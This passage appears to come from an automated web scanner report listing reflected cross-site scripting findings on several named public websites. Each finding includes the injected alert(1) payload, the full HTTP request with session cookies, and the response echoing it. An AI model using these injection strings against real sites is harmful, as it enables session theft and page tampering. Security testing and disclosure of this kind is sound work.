Last-Modified: Mon, 31 Jan 2011 21:23:25 GMT
ETag: 634320806054306710
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Content-Length: 17391
Cache-Control: public, max-age=600
Date: Sat, 14 May 2011 18:04:32 GMT
Connection: close

try{var buzzTemplate_113828="{if \n\tLoadScript(NGBaseUrl + \"NGScripts/jquery/v1.2/jquery-1.2.1.min.js\", \"window.jQuery != null\") &&\n\tLoadScript(NGBaseUrl + \"NGScripts/BuzzTemplates/videoPlayer
...[SNIP]...
,apiToken:'FBE4426140F444809F0B7D3A1169578F',name:'Reuters IN: International Deals News',buzzAppUrl:'http://nmp.newsgator.com/NGBuzz/',buzzId:113828,directUrl:'http://hosted.newsgator.com/',extraArgs:{9a4fa;alert(1)//6249158d994:'1'},targetId:null});
           
           b._targetId = targetId;
           
           b.render();
       } else {
           setTimeout(function(){
               s();
           }, 50);
       }
   } catch(e){
       
   }
};
setTimeout(s, 1);
})();var bu
...[SNIP]...

6.30. http://www.99labels.com/v1/brand-items.aspx [CategoryID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.99labels.com
Path:   /v1/brand-items.aspx

Issue detail

The value of the CategoryID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c56ff"%3balert(1)//76f550f8f78 was submitted in the CategoryID parameter. This input was echoed as c56ff";alert(1)//76f550f8f78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5c56ff"%3balert(1)//76f550f8f78&subCategoryID=Nzg5 HTTP/1.1
Host: www.99labels.com
Proxy-Connection: keep-alive
Referer: http://www.99labels.com/v1/DeliveryPolicy.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPX99ANONYMOUS=4ZXTm6wxRhDD4Oy9AjUJHOiAGBtNAUNw9Bp4knlj0psQzkkG18UPBf6hDCBJ4NYgDOzd6ZiJ6KMpMk3-wKPjc7G7Fg_gOniwp0C5QXTBtrssba5rAUvn6wad1ZlsYE0qIYhDVgK9dVpRbmHT7yYp-dwDLTIR46wybHqbi9EjCpSTpcjv0; ASP.NET_SessionId=sw5rqr454tm12q55eju1glz4; X-Mapping-nphficco=A600CB3C75C545347E22006DE45F782A; __utmz=24553842.1305398223.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fbsetting_184918808211406=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; expandable=-1c; __utma=24553842.2079333484.1305398223.1305398223.1305398223.1; __utmc=24553842; __utmb=24553842.2.10.1305398223

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Location: http://www.99labels.com/v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5c56ff";alert(1)//76f550f8f78&subCategoryID=Nzg5
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 18:39:18 GMT
Content-Length: 123775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/javascript">
function MyOpenLytebox() {

var myUrl="http://www.99labels.com/v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5c56ff";alert(1)//76f550f8f78&subCategoryID=Nzg5";
var a = document.createElement("a");
a.title = ""
a.rel = "lyteframe";
a.rev = "width: 450px; height: 265px; scrolling: auto;";
a.href
...[SNIP]...

6.31. http://www.99labels.com/v1/brand-items.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.99labels.com
Path:   /v1/brand-items.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 959c1"%3balert(1)//6820804bc38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 959c1";alert(1)//6820804bc38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5&subCategoryID=Nzg5&959c1"%3balert(1)//6820804bc38=1 HTTP/1.1
Host: www.99labels.com
Proxy-Connection: keep-alive
Referer: http://www.99labels.com/v1/DeliveryPolicy.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPX99ANONYMOUS=4ZXTm6wxRhDD4Oy9AjUJHOiAGBtNAUNw9Bp4knlj0psQzkkG18UPBf6hDCBJ4NYgDOzd6ZiJ6KMpMk3-wKPjc7G7Fg_gOniwp0C5QXTBtrssba5rAUvn6wad1ZlsYE0qIYhDVgK9dVpRbmHT7yYp-dwDLTIR46wybHqbi9EjCpSTpcjv0; ASP.NET_SessionId=sw5rqr454tm12q55eju1glz4; X-Mapping-nphficco=A600CB3C75C545347E22006DE45F782A; __utmz=24553842.1305398223.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fbsetting_184918808211406=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; expandable=-1c; __utma=24553842.2079333484.1305398223.1305398223.1305398223.1; __utmc=24553842; __utmb=24553842.2.10.1305398223

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Location: http://www.99labels.com/v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5&subCategoryID=Nzg5&959c1";alert(1)//6820804bc38=1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 18:48:08 GMT
Content-Length: 123778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/javascript">
function MyOpenLytebox() {

var myUrl="http://www.99labels.com/v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5&subCategoryID=Nzg5&959c1";alert(1)//6820804bc38=1";
var a = document.createElement("a");
a.title = ""
a.rel = "lyteframe";
a.rev = "width: 450px; height: 265px; scrolling: auto;";
a.href = "loginpopup.as
...[SNIP]...

6.32. http://www.99labels.com/v1/brand-items.aspx [subCategoryID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.99labels.com
Path:   /v1/brand-items.aspx

Issue detail

The value of the subCategoryID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2962"%3balert(1)//f057abdf14f was submitted in the subCategoryID parameter. This input was echoed as a2962";alert(1)//f057abdf14f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5&subCategoryID=Nzg5a2962"%3balert(1)//f057abdf14f HTTP/1.1
Host: www.99labels.com
Proxy-Connection: keep-alive
Referer: http://www.99labels.com/v1/DeliveryPolicy.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPX99ANONYMOUS=4ZXTm6wxRhDD4Oy9AjUJHOiAGBtNAUNw9Bp4knlj0psQzkkG18UPBf6hDCBJ4NYgDOzd6ZiJ6KMpMk3-wKPjc7G7Fg_gOniwp0C5QXTBtrssba5rAUvn6wad1ZlsYE0qIYhDVgK9dVpRbmHT7yYp-dwDLTIR46wybHqbi9EjCpSTpcjv0; ASP.NET_SessionId=sw5rqr454tm12q55eju1glz4; X-Mapping-nphficco=A600CB3C75C545347E22006DE45F782A; __utmz=24553842.1305398223.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fbsetting_184918808211406=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; expandable=-1c; __utma=24553842.2079333484.1305398223.1305398223.1305398223.1; __utmc=24553842; __utmb=24553842.2.10.1305398223

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Location: http://www.99labels.com/v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5&subCategoryID=Nzg5a2962";alert(1)//f057abdf14f
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 18:40:18 GMT
Content-Length: 123775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/javascript">
function MyOpenLytebox() {

var myUrl="http://www.99labels.com/v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5&subCategoryID=Nzg5a2962";alert(1)//f057abdf14f";
var a = document.createElement("a");
a.title = ""
a.rel = "lyteframe";
a.rev = "width: 450px; height: 265px; scrolling: auto;";
a.href = "loginpopup.aspx
...[SNIP]...

6.33. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a9985<script>alert(1)</script>900f9a49cb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.phpa9985<script>alert(1)</script>900f9a49cb1 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 14 May 2011 14:13:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=ebj703gvt5r2gslmpt3d04joq2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1378
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.phpa9985<script>alert(1)</script>900f9a49cb1</strong>
...[SNIP]...

6.34. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acdce"-alert(1)-"46cb1b4d668 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.phpacdce"-alert(1)-"46cb1b4d668 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 14 May 2011 14:13:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=vsq9rt013l0c7oj43i8m6quc00; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.phpacdce"-alert(1)-"46cb1b4d668";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

6.35. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5587"-alert(1)-"21beff286f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/d5587"-alert(1)-"21beff286f3 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:13:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 95813

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/d5587"-alert(1)-"21beff286f3";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

6.36. http://www.classesandcareers.com/schooldegrees/fusion.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classesandcareers.com
Path:   /schooldegrees/fusion.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee0aa"><script>alert(1)</script>3a9f1f2068e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /schooldegrees/fusion.php?ee0aa"><script>alert(1)</script>3a9f1f2068e=1 HTTP/1.1
Host: www.classesandcareers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:13:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=fhlpo5j0k74fnmkurmqel3bnq7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23746

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>


<!-- Google Website Optimizer Control Script -->
<script>

...[SNIP]...
<input type="hidden" name="ee0aa"><script>alert(1)</script>3a9f1f2068e" value="1" />
...[SNIP]...

6.37. http://www.naukri.com/tieups/tieups.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.naukri.com
Path:   /tieups/tieups.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75e79"><script>alert(1)</script>33f4ea0dd83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tieups/tieups.php?othersrcp=5424&id=&75e79"><script>alert(1)</script>33f4ea0dd83=1 HTTP/1.1
Host: www.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test=naukri.com; _nkjs=0.52285400+1305381509380163; __utmz=266160400.1305381512.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=266160400.327843968.1305381512.1305381512.1305381512.1; __utmc=266160400; __utmb=266160400.2.10.1305381512

Response

HTTP/1.1 200 OK
Server: NWS/1.0
X-Powered-By: PHP/5.2.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: Accept-Encoding
Content-Length: 160
Content-Type: text/html
Date: Sat, 14 May 2011 13:59:11 GMT
Connection: close
Set-Cookie: HitsFromTieup=5424; expires=Sat, 14-May-2011 14:19:11 GMT; path=/; domain=.naukri.com
Set-Cookie: wExp=N; expires=Sat, 14-May-2011 14:19:11 GMT; path=/; domain=.naukri.com
Set-Cookie: TieupFromTMS=10; expires=Sat, 14-May-2011 14:29:11 GMT; path=/; domain=.naukri.com

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://my.naukri.com/manager/createacc2.php?othersrcp=5424&wExp=N&id=&75e79"><script>alert(1)</script>33f4ea0dd83=1">

6.38. http://www.policybazaar.com/Default.aspx [__CALLBACKID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.policybazaar.com
Path:   /Default.aspx

Issue detail

The value of the __CALLBACKID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f17c6'%3balert(1)//5d0669ab4e was submitted in the __CALLBACKID parameter. This input was echoed as f17c6';alert(1)//5d0669ab4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /Default.aspx HTTP/1.1
Host: www.policybazaar.com
Proxy-Connection: keep-alive
Referer: http://www.policybazaar.com/
Content-Length: 3858
Origin: http://www.policybazaar.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=srwt14bcebnz0keia3ex2fnn; __utmz=67090863.1305381458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=67090863.168103630.1305381458.1305381458.1305381458.1; __utmc=67090863; __utmb=67090863.1.10.1305381458

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEwNDQ1OTA4ODMPZBYCZg9kFgJmD2QWAgIBDxYCHgZvbmxvYWQFWW1lbnVfZW5hYmxlKCk7Z2V0QWN0aXZlTGF5ZXIoKTtwcmVwYXJlSW5wdXRzRm9ySGludHMoKTtnZXRBY3RpdmVTdWJNZW
...[SNIP]...
OmJsb2NrO2QCCQ9kFgJmD2QWAmYPZBYCAgEPDxYCHgdWaXNpYmxlZ2RkZA%3D%3D&=&ctl00%24ctl00%24RightBanner%24RightNavControl%24hdnfldHtmlTableForRightbanner=&__CALLBACKID=ctl00%24ctl00%24MainContent%24DefaultFormf17c6'%3balert(1)//5d0669ab4e&__CALLBACKPARAM=CallNews&__EVENTVALIDATION=%2FwEWAgK61fyWDgLgh%2FiIDA%3D%3D

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:03:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Content-Length: 156

eThe target 'ctl00$ctl00$MainContent$DefaultFormf17c6';alert(1)//5d0669ab4e' for the callback could not be found or did not implement ICallbackEventHandler.

6.39. http://www.quarles.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quarles.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e1b4'-alert(1)-'5d5a879e026 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?3e1b4'-alert(1)-'5d5a879e026=1 HTTP/1.1
Host: www.quarles.com
Proxy-Connection: keep-alive
Referer: http://www.quarles.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1036; PortletId=701; SiteId=1035; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=5ryguaijsygcdw45f41m3155; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1034&RootPortletID=614&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7; NSC_QPE-FHB5152-Tibsfe=ffffffff09d5f62e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 11:26:20 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible:IE=EmulateIE7
x-geoloc:02
x-client:000912
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:04
x-server:EG-HUBRD-A52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1036; path=/
Set-Cookie: PortletId=701; path=/
Set-Cookie: SiteId=1035; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 34317
Content-Length: 34317


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>
           Quarles & Brady LLP
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
...[SNIP]...
<script language="javascript">
function printDocument() {
   var sUrl = 'http://www.quarles.com/?3e1b4'-alert(1)-'5d5a879e026=1&print=true';
   var oDoc = window.open(sUrl, "print");
}
</script>
...[SNIP]...

6.40. http://www.quora.com/up/tchannel4/updates [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quora.com
Path:   /up/tchannel4/updates

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 48973<script>alert(1)</script>39ec8f66e90 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /up/tchannel4/updates?min_seq=7021982&channel=main-w-dep9-2162319527561981685&timeout=2000&callback=jsonp12ff361b2da9689beda48973<script>alert(1)</script>39ec8f66e90 HTTP/1.1
Host: www.quora.com
Proxy-Connection: keep-alive
Referer: http://www.quora.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: m-b=KnQltoIvGU-zgVNet6ZeBQ==; __utmz=261736717.1305305580.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); m-s=elrhGUM55MQtNfHFxEBqeA==; m-tz=300; __utmv=; __utma=261736717.2135279484.1305305580.1305305580.1305458355.2; __utmc=261736717; __utmb=261736717.1.10.1305458355

Response

HTTP/1.1 200 OK
Content-Length: 103
Etag: "5ad7c3ab1b25c03e2e39fa371b75ce0b6c6b54d1"
Content-Type: text/javascript; charset=UTF-8
Server: TornadoServer/1.2.1

jsonp12ff361b2da9689beda48973<script>alert(1)</script>39ec8f66e90({"messages": [], "min_seq": 7022611})

6.41. http://www.stowetoday.com/search/opensearch/generic.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stowetoday.com
Path:   /search/opensearch/generic.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5245c"style%3d"x%3aexpression(alert(1))"443bfa630be was submitted in the REST URL parameter 2. This input was echoed as 5245c"style="x:expression(alert(1))"443bfa630be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search/opensearch5245c"style%3d"x%3aexpression(alert(1))"443bfa630be/generic.xml HTTP/1.1
Host: www.stowetoday.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=235831491.1305412146.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=e3e1df2-12ff0a09dd3-63d2808d-1; __utma=235831491.1676825239.1305412146.1305412146.1305412146.1; __utmc=235831491; __utmb=235831491.2.10.1305412146

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2825420
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:30:23 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.2225
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: stowetoday.com
X-TNCMS-Served-By: cmsapp14
Content-Length: 38831


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
